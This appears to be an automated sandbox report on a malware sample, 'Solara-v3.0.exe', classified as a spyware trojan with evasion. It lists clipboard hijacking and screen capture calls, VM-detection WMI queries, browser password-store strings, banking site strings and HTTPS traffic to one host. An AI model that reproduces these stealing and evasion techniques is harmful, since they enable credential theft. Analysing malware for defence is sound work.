                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49709 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49727 version: TLS 1.2
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004322E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,4_2_004322E0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_05851000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,4_2_05851000
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004322E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,4_2_004322E0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043328C GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,4_2_0043328C
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00C910000_2_00C91000
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00C9F5550_2_00C9F555
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00CB77920_2_00CB7792
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00CA9CC00_2_00CA9CC0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00CB5C5E0_2_00CB5C5E
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00CA3FB20_2_00CA3FB2
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00C910003_2_00C91000
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00C9F5553_2_00C9F555
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00CB77923_2_00CB7792
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00CA9CC03_2_00CA9CC0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00CB5C5E3_2_00CB5C5E
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00CA3FB23_2_00CA3FB2
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0042C8D04_2_0042C8D0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0040A8B04_2_0040A8B0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043F1504_2_0043F150
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004379604_2_00437960
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043B1D04_2_0043B1D0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004102474_2_00410247
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0040B2624_2_0040B262
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043FB104_2_0043FB10
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00409C6F4_2_00409C6F
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00437CF04_2_00437CF0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004215704_2_00421570
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004265204_2_00426520
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004236754_2_00423675
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0040C6214_2_0040C621
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004116A04_2_004116A0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004240604_2_00424060
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043E8204_2_0043E820
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0041602C4_2_0041602C
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004038F04_2_004038F0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004320B04_2_004320B0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043B9404_2_0043B940
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004141614_2_00414161
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004181704_2_00418170
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004371704_2_00437170
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0041717B4_2_0041717B
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004091004_2_00409100
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0041D9004_2_0041D900
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043E9204_2_0043E920
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004059304_2_00405930
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004199304_2_00419930
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043E9D04_2_0043E9D0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004151A94_2_004151A9
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0040E9B04_2_0040E9B0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004061B04_2_004061B0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004269B04_2_004269B0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043EA604_2_0043EA60
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00415A724_2_00415A72
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0042F2114_2_0042F211
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0042822F4_2_0042822F
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004082C04_2_004082C0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00425ACF4_2_00425ACF
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00425ACF4_2_00425ACF
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00425A904_2_00425A90
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004042A04_2_004042A0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0041CAA04_2_0041CAA0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0040EB3B4_2_0040EB3B
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004373D04_2_004373D0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00404BE04_2_00404BE0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0041138A4_2_0041138A
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0041E3904_2_0041E390
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00423C404_2_00423C40
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043F4504_2_0043F450
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0042CC5D4_2_0042CC5D
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004304704_2_00430470
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004074104_2_00407410
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00427C294_2_00427C29
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00410C834_2_00410C83
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0042B48C4_2_0042B48C
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004164A34_2_004164A3
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004275514_2_00427551
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004365694_2_00436569
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004095704_2_00409570
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0042BD774_2_0042BD77
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0040F5294_2_0040F529
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0041DDC04_2_0041DDC0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0041ADD04_2_0041ADD0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0042F5D94_2_0042F5D9
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004285E14_2_004285E1
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00405DF04_2_00405DF0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004066404_2_00406640
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00438E404_2_00438E40
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043B6504_2_0043B650
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00431E504_2_00431E50
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0042CE604_2_0042CE60
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043DE194_2_0043DE19
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004296304_2_00429630
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0042BE3B4_2_0042BE3B
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00423EC04_2_00423EC0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004386C04_2_004386C0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00402ED04_2_00402ED0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00435ED34_2_00435ED3
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0042DEF14_2_0042DEF1
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0042BE9D4_2_0042BE9D
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0042C8D04_2_0042C8D0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004167774_2_00416777
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043E7104_2_0043E710
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0041B7294_2_0041B729
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00438FD94_2_00438FD9
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043F7804_2_0043F780
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004177AD4_2_004177AD
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: String function: 00CACFD6 appears 40 times
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: String function: 00C9FAE4 appears 34 times
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: String function: 00413CD0 appears 75 times
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: String function: 00CA0730 appears 38 times
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: String function: 00407FA0 appears 47 times
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: String function: 00CA80F8 appears 42 times
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: String function: 00C9FA60 appears 100 times
                    Source: Solara-v3.0.exeStatic PE information: invalid certificate
                    Source: Solara-v3.0.exe, 00000000.00000000.2025856316.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Solara-v3.0.exe
                    Source: Solara-v3.0.exe, 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Solara-v3.0.exe
                    Source: Solara-v3.0.exe, 00000003.00000000.2032657804.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Solara-v3.0.exe
                    Source: Solara-v3.0.exe, 00000004.00000002.3287079855.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Solara-v3.0.exe
                    Source: Solara-v3.0.exe, 00000004.00000003.2033176772.0000000004D57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Solara-v3.0.exe
                    Source: Solara-v3.0.exeBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Solara-v3.0.exe
                    Source: Solara-v3.0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Solara-v3.0.exeStatic PE information: Section: .bss ZLIB complexity 1.0003298756270902
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/1@11/2
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00437CF0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,4_2_00437CF0
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
                    Source: Solara-v3.0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Solara-v3.0.exe, 00000004.00000003.2119068952.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2142061366.0000000005A2A000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118711046.0000000005A47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Solara-v3.0.exeReversingLabs: Detection: 36%
                    Source: Solara-v3.0.exeVirustotal: Detection: 50%
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile read: C:\Users\user\Desktop\Solara-v3.0.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Solara-v3.0.exe "C:\Users\user\Desktop\Solara-v3.0.exe"
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeProcess created: C:\Users\user\Desktop\Solara-v3.0.exe "C:\Users\user\Desktop\Solara-v3.0.exe"
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeProcess created: C:\Users\user\Desktop\Solara-v3.0.exe "C:\Users\user\Desktop\Solara-v3.0.exe"
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeProcess created: C:\Users\user\Desktop\Solara-v3.0.exe "C:\Users\user\Desktop\Solara-v3.0.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeProcess created: C:\Users\user\Desktop\Solara-v3.0.exe "C:\Users\user\Desktop\Solara-v3.0.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: Solara-v3.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: Solara-v3.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: Solara-v3.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: Solara-v3.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: Solara-v3.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: Solara-v3.0.exeStatic PE information: real checksum: 0x96fd3 should be: 0x902c3
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00C9FB83 push ecx; ret 0_2_00C9FB96
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00C9FB83 push ecx; ret 3_2_00C9FB96
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004479FC push edi; retf 4_2_004479FD
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00419185 push ebx; ret 4_2_0041918C
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004191BB push ebx; ret 4_2_004191CE
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00447371 push 084300B2h; ret 4_2_0044739E
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00444D1C push eax; retf 4_2_00444D1E
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00447D95 pushad ; iretd 4_2_00447FDD
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043B5B0 push eax; mov dword ptr [esp], 31A531AAh4_2_0043B5BE
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043E6B0 push eax; mov dword ptr [esp], 352E36E1h4_2_0043E6B3
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00446F14 push ebp; ret 4_2_00446F15
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                    Query firmware table information (likely to detect VMs)
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeWindow / User API: threadDelayed 6290Jump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-21243
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe TID: 1496Thread sleep time: -210000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exe TID: 6488Thread sleep count: 6290 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00CB1FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00CB1FE9
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00CB1F38 FindFirstFileExW,0_2_00CB1F38
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00CB1FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00CB1FE9
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00CB1F38 FindFirstFileExW,3_2_00CB1F38
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005AC3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
